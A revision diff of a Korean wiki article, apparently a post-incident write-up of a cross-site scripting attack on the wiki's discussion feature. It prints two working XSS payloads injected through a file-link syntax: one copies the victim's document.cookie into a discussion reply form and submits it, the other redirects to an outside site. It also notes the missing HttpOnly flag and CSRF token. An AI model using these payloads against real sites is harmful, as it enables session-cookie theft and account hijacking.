r19 vs r20 | ||
---|---|---|
... | ... | |
15 | 15 | 사실 자동 로그인 쿠키에 HttpOnly 속성만 들어가 있었어도 공격자가 특정 사이트--히토미--를 띄울 수 있었다는 것 외에 전혀 피해가 없을 수 있다는 점 또한 아쉬웠다. |
16 | 16 | == 공격 코드 == |
17 | 17 | {{{[[파일:<script>$('textarea').val(document.cookie);$('form.new-thread-form').submit();</script>]]}}}[* jQuery를 잘 모르는 분들을 위하여 설명하자면.. textarea 에 해당 페이지의 쿠키를 작성하라 라는 코드이다. 그 뒤 코드는 new-thread-form 이라는 클래스를 가진 폼을 제출 하라는 의미.JS로는 document.getElementsByTagName("textarea").value 가 되겠다.] |
18 | {{{[[파일:<script>location.assign('https://hitomi.la');</script>]]}}}[* 히토미로 날려버리라는 코드이다. | |
18 | {{{[[파일:<script>location.assign('https://hitomi.la');</script>]]}}}[* 히토미로 날려버리라는 코드이다.location.href 로도 가능하다.] | |
19 | 19 | |
20 | 20 | 구현의 귀찮음으로 인해 쓰레드에 레스를 작성하는 부분이 CSRF 토큰이 없었는데 사실 있어도 이 케이스에서는 별 쓸모가 없었다. |
21 | 21 | 다행인 점은 CSP로 인해 공격자가 외부 서버 등으로 쿠키를 전송할 수 없어서 토론 레스로 남기게 끔[* 좀 창의적이었다.] 했는데 이 때문에 정확한 피해자 특정이 가능했다. |
... | ... |